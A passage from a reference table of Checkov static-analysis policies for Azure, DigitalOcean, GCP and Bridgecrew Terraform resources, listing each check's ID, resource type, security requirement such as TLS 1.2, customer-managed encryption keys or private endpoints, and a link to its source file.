CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | -| 1492 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | -| 1493 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | -| 1494 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | -| 1495 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1496 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1497 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | -| 1498 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | -| 1499 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | -| 1500 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | -| 1501 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | -| 1502 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | -| 1503 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | -| 1504 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | -| 1505 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | -| 1506 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | -| 1507 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1508 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1509 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1510 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1511 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1512 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1513 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1514 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1515 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1516 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1517 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1518 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1519 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1520 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1521 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1522 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1523 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | -| 1524 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1525 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1526 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1527 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | -| 1528 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1529 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1530 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | -| 1531 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | -| 1532 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1533 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1534 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1535 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1536 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 1537 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1538 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1539 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1540 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1541 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 1542 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1543 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1544 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1545 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1546 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1547 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1548 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1549 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1550 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 1551 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 1552 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 1553 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 1554 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 1555 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 1556 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 1557 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 1558 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 1559 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 1560 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 1561 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 1562 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 1563 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 1564 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | -| 1565 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | -| 1566 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 1567 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 1568 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 1569 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 1570 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | -| 1571 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | -| 1572 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | -| 1573 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | -| 1574 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | -| 1575 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | -| 1576 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 1577 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 1578 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | -| 1579 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | -| 1580 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | -| 1581 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | -| 1582 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | -| 1583 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | -| 1584 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | -| 1585 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | -| 1586 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | -| 1587 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies 